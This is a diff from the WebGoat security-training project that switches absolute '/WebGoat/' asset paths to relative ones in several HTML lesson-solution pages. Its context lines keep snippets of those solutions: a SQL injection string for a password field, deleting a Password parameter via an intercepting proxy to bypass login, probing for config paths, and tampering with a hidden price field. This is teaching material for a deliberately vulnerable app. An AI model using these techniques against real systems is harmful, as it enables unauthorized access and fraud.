<link rel=themeData href="lesson_solutions/DOS_Login_files/themedata.thmx">
<link rel=colorSchemeMapping href="lesson_solutions/DOS_Login_files/colorschememapping.xml">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:Zoom>90</w:Zoom>
@ -651,9 +651,9 @@ SQL Injection attack. Enter in the password field ' or '1' = '1<o:p></o:p></span
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="Picture_x0020_9" o:spid="_x0000_i1026" type="#_x0000_t75"
style='width:480pt;height:277.5pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/DOS_Login_files/image001.png" o:title=""/>
<v:imagedata src="lesson_solutions/DOS_Login_files/image001.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/DOS_Login_files/image002.jpg" v:shapes="Picture_x0020_9"><![endif]></span></p>
src="lesson_solutions/DOS_Login_files/image002.jpg" v:shapes="Picture_x0020_9"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -673,9 +673,9 @@ password passwd1. And finally login with jplane and passwd3. <o:p></o:p></span><
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_10"
o:spid="_x0000_i1025" type="#_x0000_t75" style='width:480pt;height:277.5pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/DOS_Login_files/image003.png" o:title=""/>
<v:imagedata src="lesson_solutions/DOS_Login_files/image003.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/DOS_Login_files/image004.jpg" v:shapes="Picture_x0020_10"><![endif]></span></p>
src="lesson_solutions/DOS_Login_files/image004.jpg" v:shapes="Picture_x0020_10"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC

2
webgoat/main/project/WebContent/lesson_solutions/DangerousEval.html
View File

@ -3,7 +3,7 @@
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Dangerous Use of Eval</title>
<link rel="stylesheet" type="text/css" href="/WebGoat/lesson_solutions/formate.css">
<link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">
</head>
<body>
<p><b>Lesson Plan Title:</b> Dangerous Use of Eval)</p>

2
webgoat/main/project/WebContent/lesson_solutions/Encoding.html
View File

@ -3,7 +3,7 @@
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Encoding Basics</title>
<link rel="stylesheet" type="text/css" href="/WebGoat/lesson_solutions/formate.css">
<link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">
</head>
<body>
<p><b>Lesson Plan Title:</b> How to Perform Cross Site Scripting (XSS)</p>

24
webgoat/main/project/WebContent/lesson_solutions/FailOpenAuthentication.html
View File

@ -9,8 +9,8 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<link rel=File-List href="/WebGoat/lesson_solutions/FailOpenAuthentication_files/filelist.xml">
<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/FailOpenAuthentication_files/editdata.mso">
<link rel=File-List href="lesson_solutions/FailOpenAuthentication_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/FailOpenAuthentication_files/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
@ -36,9 +36,9 @@ w\:* {behavior:url(#default#VML);}
<o:Version>12.00</o:Version>
</o:DocumentProperties>
</xml><![endif]-->
<link rel=themeData href="/WebGoat/lesson_solutions/FailOpenAuthentication_files/themedata.thmx">
<link rel=themeData href="lesson_solutions/FailOpenAuthentication_files/themedata.thmx">
<link rel=colorSchemeMapping
href="/WebGoat/lesson_solutions/FailOpenAuthentication_files/colorschememapping.xml">
href="lesson_solutions/FailOpenAuthentication_files/colorschememapping.xml">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:Zoom>90</w:Zoom>
@ -635,9 +635,9 @@ should be able to bypass the authentication check.<o:p></o:p></span></p>
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="Picture_x0020_3" o:spid="_x0000_i1028" type="#_x0000_t75"
style='width:480pt;height:277.5pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/FailOpenAuthentication_files/image001.png" o:title=""/>
<v:imagedata src="lesson_solutions/FailOpenAuthentication_files/image001.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/FailOpenAuthentication_files/image009.jpg" v:shapes="Picture_x0020_3"><![endif]></span></p>
src="lesson_solutions/FailOpenAuthentication_files/image009.jpg" v:shapes="Picture_x0020_3"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -661,9 +661,9 @@ name webgoat and click "Login". Intercept the request with WebScarab.<o:p></o:p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_7"
o:spid="_x0000_i1027" type="#_x0000_t75" style='width:459.75pt;height:362.25pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/FailOpenAuthentication_files/image003.png" o:title=""/>
<v:imagedata src="lesson_solutions/FailOpenAuthentication_files/image003.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=613 height=483
src="/WebGoat/lesson_solutions/FailOpenAuthentication_files/image010.jpg" v:shapes="Picture_x0020_7"><![endif]></span></p>
src="lesson_solutions/FailOpenAuthentication_files/image010.jpg" v:shapes="Picture_x0020_7"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -683,9 +683,9 @@ variable "Password" and click "Delete". Click "Accept changes".<o:p></o:p></span
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_8"
o:spid="_x0000_i1026" type="#_x0000_t75" style='width:459.75pt;height:362.25pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/FailOpenAuthentication_files/image005.png" o:title=""/>
<v:imagedata src="lesson_solutions/FailOpenAuthentication_files/image005.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=613 height=483
src="/WebGoat/lesson_solutions/FailOpenAuthentication_files/image011.jpg" v:shapes="Picture_x0020_8"><![endif]></span></p>
src="lesson_solutions/FailOpenAuthentication_files/image011.jpg" v:shapes="Picture_x0020_8"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -704,9 +704,9 @@ field-end'></span><![endif]--> Password variable is deleted</p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_4"
o:spid="_x0000_i1025" type="#_x0000_t75" style='width:480pt;height:277.5pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/FailOpenAuthentication_files/image007.png" o:title=""/>
<v:imagedata src="lesson_solutions/FailOpenAuthentication_files/image007.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/FailOpenAuthentication_files/image012.jpg" v:shapes="Picture_x0020_4"><![endif]></span></p>
src="lesson_solutions/FailOpenAuthentication_files/image012.jpg" v:shapes="Picture_x0020_4"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC

34
webgoat/main/project/WebContent/lesson_solutions/ForcedBrowsing.html
View File

@ -9,8 +9,8 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<link rel=File-List href="/WebGoat/lesson_solutions/ForcedBrowsing_files/filelist.xml">
<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/ForcedBrowsing_files/editdata.mso">
<link rel=File-List href="lesson_solutions/ForcedBrowsing_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/ForcedBrowsing_files/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
@ -36,8 +36,8 @@ w\:* {behavior:url(#default#VML);}
<o:Version>12.00</o:Version>
</o:DocumentProperties>
</xml><![endif]-->
<link rel=themeData href="/WebGoat/lesson_solutions/ForcedBrowsing_files/themedata.thmx">
<link rel=colorSchemeMapping href="/WebGoat/lesson_solutions/ForcedBrowsing_files/colorschememapping.xml">
<link rel=themeData href="lesson_solutions/ForcedBrowsing_files/themedata.thmx">
<link rel=colorSchemeMapping href="lesson_solutions/ForcedBrowsing_files/colorschememapping.xml">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:Zoom>90</w:Zoom>
@ -664,9 +664,9 @@ style='font-family:"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="Picture_x0020_97" o:spid="_x0000_i1028" type="#_x0000_t75"
style='width:480pt;height:277.5pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/ForcedBrowsing_files/image001.png" o:title=""/>
<v:imagedata src="lesson_solutions/ForcedBrowsing_files/image001.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/ForcedBrowsing_files/image002.jpg" v:shapes="Picture_x0020_97"><![endif]></span></p>
src="lesson_solutions/ForcedBrowsing_files/image002.jpg" v:shapes="Picture_x0020_97"><![endif]></span></p>
<p class=MsoCaption style='text-align:justify'>Figure <!--[if supportFields]><span
style='mso-element:field-begin'></span><span
@ -692,8 +692,8 @@ what could be the servlet for config?<o:p></o:p></span></p>
mso-bidi-font-weight:bold'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-family:"Arial","sans-serif";
mso-bidi-font-weight:bold'>Try to access /WebGoat/config,
/WebGoat/configuration, /WebGoat/conf, ….<o:p></o:p></span></p>
mso-bidi-font-weight:bold'>Try to access config,
configuration, conf, ….<o:p></o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-family:"Arial","sans-serif";
mso-bidi-font-weight:bold'><o:p>&nbsp;</o:p></span></p>
@ -703,15 +703,15 @@ style='mso-bidi-font-weight:normal'><span style='font-family:"Arial","sans-serif
mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_98" o:spid="_x0000_i1027"
type="#_x0000_t75" style='width:480pt;height:277.5pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/ForcedBrowsing_files/image003.png" o:title=""/>
<v:imagedata src="lesson_solutions/ForcedBrowsing_files/image003.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/ForcedBrowsing_files/image004.jpg" v:shapes="Picture_x0020_98"><![endif]></span></b></p>
src="lesson_solutions/ForcedBrowsing_files/image004.jpg" v:shapes="Picture_x0020_98"><![endif]></span></b></p>
<p class=MsoCaption style='text-align:justify'>Figure <!--[if supportFields]><span
style='mso-element:field-begin'></span><span
style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC <span style='mso-element:
field-separator'></span><![endif]--><span style='mso-no-proof:yes'>2</span><!--[if supportFields]><span
style='mso-element:field-end'></span><![endif]--> No /WebGoat/config</p>
style='mso-element:field-end'></span><![endif]--> No config</p>
<p class=MsoNormal style='text-align:justify'><o:p>&nbsp;</o:p></p>
@ -719,15 +719,15 @@ style='mso-element:field-end'></span><![endif]--> No /WebGoat/config</p>
style='mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_99"
o:spid="_x0000_i1026" type="#_x0000_t75" style='width:480pt;height:277.5pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/ForcedBrowsing_files/image005.png" o:title=""/>
<v:imagedata src="lesson_solutions/ForcedBrowsing_files/image005.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/ForcedBrowsing_files/image006.jpg" v:shapes="Picture_x0020_99"><![endif]></span></p>
src="lesson_solutions/ForcedBrowsing_files/image006.jpg" v:shapes="Picture_x0020_99"><![endif]></span></p>
<p class=MsoCaption style='text-align:justify'>Figure <!--[if supportFields]><span
style='mso-element:field-begin'></span><span
style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC <span style='mso-element:
field-separator'></span><![endif]--><span style='mso-no-proof:yes'>3</span><!--[if supportFields]><span
style='mso-element:field-end'></span><![endif]--> No /WebGoat/configuration</p>
style='mso-element:field-end'></span><![endif]--> No configuration</p>
<p class=MsoNormal style='text-align:justify'><o:p>&nbsp;</o:p></p>
@ -735,15 +735,15 @@ style='mso-element:field-end'></span><![endif]--> No /WebGoat/configuration</p>
style='mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_100"
o:spid="_x0000_i1025" type="#_x0000_t75" style='width:480pt;height:277.5pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/ForcedBrowsing_files/image007.png" o:title=""/>
<v:imagedata src="lesson_solutions/ForcedBrowsing_files/image007.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/ForcedBrowsing_files/image008.jpg" v:shapes="Picture_x0020_100"><![endif]></span></p>
src="lesson_solutions/ForcedBrowsing_files/image008.jpg" v:shapes="Picture_x0020_100"><![endif]></span></p>
<p class=MsoCaption style='text-align:justify'>Figure <!--[if supportFields]><span
style='mso-element:field-begin'></span><span
style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC <span style='mso-element:
field-separator'></span><![endif]--><span style='mso-no-proof:yes'>4</span><!--[if supportFields]><span
style='mso-element:field-end'></span><![endif]--> Bingo for /WebGoat/conf</p>
style='mso-element:field-end'></span><![endif]--> Bingo for conf</p>
<p class=MsoNormal style='text-align:justify'><o:p>&nbsp;</o:p></p>

36
webgoat/main/project/WebContent/lesson_solutions/ForgotPassword.html
View File

@ -9,8 +9,8 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<link rel=File-List href="/WebGoat/lesson_solutions/ForgotPassword_files/filelist.xml">
<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/ForgotPassword_files/editdata.mso">
<link rel=File-List href="lesson_solutions/ForgotPassword_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/ForgotPassword_files/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
@ -36,8 +36,8 @@ w\:* {behavior:url(#default#VML);}
<o:Version>12.00</o:Version>
</o:DocumentProperties>
</xml><![endif]-->
<link rel=themeData href="/WebGoat/lesson_solutions/ForgotPassword_files/themedata.thmx">
<link rel=colorSchemeMapping href="/WebGoat/lesson_solutions/ForgotPassword_files/colorschememapping.xml">
<link rel=themeData href="lesson_solutions/ForgotPassword_files/themedata.thmx">
<link rel=colorSchemeMapping href="lesson_solutions/ForgotPassword_files/colorschememapping.xml">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:TrackMoves>false</w:TrackMoves>
@ -651,9 +651,9 @@ else his password.<o:p></o:p></span></p>
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="Picture_x0020_477" o:spid="_x0000_i1031" type="#_x0000_t75"
style='width:480pt;height:276pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/ForgotPassword_files/image001.png" o:title=""/>
<v:imagedata src="lesson_solutions/ForgotPassword_files/image001.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=368
src="/WebGoat/lesson_solutions/ForgotPassword_files/image015.jpg" v:shapes="Picture_x0020_477"><![endif]></span></p>
src="lesson_solutions/ForgotPassword_files/image015.jpg" v:shapes="Picture_x0020_477"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -673,9 +673,9 @@ you will get a password reminder, only not via e-mail.<o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_478"
o:spid="_x0000_i1030" type="#_x0000_t75" style='width:480pt;height:276pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/ForgotPassword_files/image003.png" o:title=""/>
<v:imagedata src="lesson_solutions/ForgotPassword_files/image003.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=368
src="/WebGoat/lesson_solutions/ForgotPassword_files/image016.jpg" v:shapes="Picture_x0020_478"><![endif]></span></p>
src="lesson_solutions/ForgotPassword_files/image016.jpg" v:shapes="Picture_x0020_478"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -690,9 +690,9 @@ field-end'></span><![endif]--> Submit the answer red<span style='font-family:
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_479"
o:spid="_x0000_i1029" type="#_x0000_t75" style='width:480pt;height:276pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/ForgotPassword_files/image005.png" o:title=""/>
<v:imagedata src="lesson_solutions/ForgotPassword_files/image005.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=368
src="/WebGoat/lesson_solutions/ForgotPassword_files/image017.jpg" v:shapes="Picture_x0020_479"><![endif]></span></p>
src="lesson_solutions/ForgotPassword_files/image017.jpg" v:shapes="Picture_x0020_479"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -721,9 +721,9 @@ to guess the password for another user. The text tells you something about an
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_480"
o:spid="_x0000_i1028" type="#_x0000_t75" style='width:480pt;height:276pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/ForgotPassword_files/image007.png" o:title=""/>
<v:imagedata src="lesson_solutions/ForgotPassword_files/image007.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=368
src="/WebGoat/lesson_solutions/ForgotPassword_files/image018.jpg" v:shapes="Picture_x0020_480"><![endif]></span></p>
src="lesson_solutions/ForgotPassword_files/image018.jpg" v:shapes="Picture_x0020_480"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -743,9 +743,9 @@ Now you need the guess some colors.<o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_481"
o:spid="_x0000_i1027" type="#_x0000_t75" style='width:480pt;height:276pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/ForgotPassword_files/image009.png" o:title=""/>
<v:imagedata src="lesson_solutions/ForgotPassword_files/image009.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=368
src="/WebGoat/lesson_solutions/ForgotPassword_files/image019.jpg" v:shapes="Picture_x0020_481"><![endif]></span></p>
src="lesson_solutions/ForgotPassword_files/image019.jpg" v:shapes="Picture_x0020_481"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -767,9 +767,9 @@ and green for example.<o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_482"
o:spid="_x0000_i1026" type="#_x0000_t75" style='width:480pt;height:276pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/ForgotPassword_files/image011.png" o:title=""/>
<v:imagedata src="lesson_solutions/ForgotPassword_files/image011.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=368
src="/WebGoat/lesson_solutions/ForgotPassword_files/image020.jpg" v:shapes="Picture_x0020_482"><![endif]></span></p>
src="lesson_solutions/ForgotPassword_files/image020.jpg" v:shapes="Picture_x0020_482"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -788,9 +788,9 @@ incorrect response.<o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_483"
o:spid="_x0000_i1025" type="#_x0000_t75" style='width:480pt;height:276pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/ForgotPassword_files/image013.png" o:title=""/>
<v:imagedata src="lesson_solutions/ForgotPassword_files/image013.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=368
src="/WebGoat/lesson_solutions/ForgotPassword_files/image021.jpg" v:shapes="Picture_x0020_483"><![endif]></span></p>
src="lesson_solutions/ForgotPassword_files/image021.jpg" v:shapes="Picture_x0020_483"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC

28
webgoat/main/project/WebContent/lesson_solutions/HiddenFieldTampering.html
View File

@ -9,8 +9,8 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<link rel=File-List href="/WebGoat/lesson_solutions/HiddenFieldTampering_files/filelist.xml">
<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/HiddenFieldTampering_files/editdata.mso">
<link rel=File-List href="lesson_solutions/HiddenFieldTampering_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/HiddenFieldTampering_files/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
@ -36,9 +36,9 @@ w\:* {behavior:url(#default#VML);}
<o:Version>12.00</o:Version>
</o:DocumentProperties>
</xml><![endif]-->
<link rel=themeData href="/WebGoat/lesson_solutions/HiddenFieldTampering_files/themedata.thmx">
<link rel=themeData href="lesson_solutions/HiddenFieldTampering_files/themedata.thmx">
<link rel=colorSchemeMapping
href="/WebGoat/lesson_solutions/HiddenFieldTampering_files/colorschememapping.xml">
href="lesson_solutions/HiddenFieldTampering_files/colorschememapping.xml">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:TrackMoves>false</w:TrackMoves>
@ -560,9 +560,9 @@ price.<o:p></o:p></span></p>
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="Picture_x0020_103" o:spid="_x0000_i1029" type="#_x0000_t75"
style='width:480pt;height:276.75pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/HiddenFieldTampering_files/image001.png" o:title=""/>
<v:imagedata src="lesson_solutions/HiddenFieldTampering_files/image001.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/HiddenFieldTampering_files/image011.jpg" v:shapes="Picture_x0020_103"><![endif]></span></p>
src="lesson_solutions/HiddenFieldTampering_files/image011.jpg" v:shapes="Picture_x0020_103"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -590,9 +590,9 @@ must define proxy "localhost" with port 8008.<o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_104"
o:spid="_x0000_i1028" type="#_x0000_t75" style='width:4in;height:254.25pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/HiddenFieldTampering_files/image003.png" o:title=""/>
<v:imagedata src="lesson_solutions/HiddenFieldTampering_files/image003.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=384 height=339
src="/WebGoat/lesson_solutions/HiddenFieldTampering_files/image012.jpg" v:shapes="Picture_x0020_104"><![endif]></span><span
src="lesson_solutions/HiddenFieldTampering_files/image012.jpg" v:shapes="Picture_x0020_104"><![endif]></span><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoCaption><span style='font-family:"Arial","sans-serif"'>Figure </span><!--[if supportFields]><span
@ -614,9 +614,9 @@ WebScarab <o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_105"
o:spid="_x0000_i1027" type="#_x0000_t75" style='width:480pt;height:276.75pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/HiddenFieldTampering_files/image005.png" o:title=""/>
<v:imagedata src="lesson_solutions/HiddenFieldTampering_files/image005.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/HiddenFieldTampering_files/image013.jpg" v:shapes="Picture_x0020_105"><![endif]></span><span
src="lesson_solutions/HiddenFieldTampering_files/image013.jpg" v:shapes="Picture_x0020_105"><![endif]></span><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoCaption><span style='font-family:"Arial","sans-serif"'>Figure </span><!--[if supportFields]><span
@ -634,9 +634,9 @@ style='font-family:"Arial","sans-serif"'> Intercept request with WebScarab<o:p><
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_106"
o:spid="_x0000_i1026" type="#_x0000_t75" style='width:480pt;height:276.75pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/HiddenFieldTampering_files/image007.png" o:title=""/>
<v:imagedata src="lesson_solutions/HiddenFieldTampering_files/image007.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/HiddenFieldTampering_files/image014.jpg" v:shapes="Picture_x0020_106"><![endif]></span><span
src="lesson_solutions/HiddenFieldTampering_files/image014.jpg" v:shapes="Picture_x0020_106"><![endif]></span><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoCaption><span style='font-family:"Arial","sans-serif"'>Figure </span><!--[if supportFields]><span
@ -653,9 +653,9 @@ style='font-family:"Arial","sans-serif"'> Change the Price variable to 1<o:p></o
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_107"
o:spid="_x0000_i1025" type="#_x0000_t75" style='width:480pt;height:276.75pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/HiddenFieldTampering_files/image009.png" o:title=""/>
<v:imagedata src="lesson_solutions/HiddenFieldTampering_files/image009.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/HiddenFieldTampering_files/image015.jpg" v:shapes="Picture_x0020_107"><![endif]></span><span
src="lesson_solutions/HiddenFieldTampering_files/image015.jpg" v:shapes="Picture_x0020_107"><![endif]></span><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoCaption><span style='font-family:"Arial","sans-serif"'>Figure </span><!--[if supportFields]><span

28
webgoat/main/project/WebContent/lesson_solutions/HtmlClues.html
View File

@ -9,8 +9,8 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<link rel=File-List href="/WebGoat/lesson_solutions/HtmlClues_files/filelist.xml">
<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/HtmlClues_files/editdata.mso">
<link rel=File-List href="lesson_solutions/HtmlClues_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/HtmlClues_files/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
@ -36,8 +36,8 @@ w\:* {behavior:url(#default#VML);}
<o:Version>12.00</o:Version>
</o:DocumentProperties>
</xml><![endif]-->
<link rel=themeData href="/WebGoat/lesson_solutions/HtmlClues_files/themedata.thmx">
<link rel=colorSchemeMapping href="/WebGoat/lesson_solutions/HtmlClues_files/colorschememapping.xml">
<link rel=themeData href="lesson_solutions/HtmlClues_files/themedata.thmx">
<link rel=colorSchemeMapping href="lesson_solutions/HtmlClues_files/colorschememapping.xml">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:TrackMoves>false</w:TrackMoves>
@ -557,9 +557,9 @@ should be able to bypass the authentication check.<o:p></o:p></span></p>
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="Picture_x0020_38" o:spid="_x0000_i1029" type="#_x0000_t75"
style='width:480pt;height:276.75pt;visibility:visible;mso-wrap-style:square'>
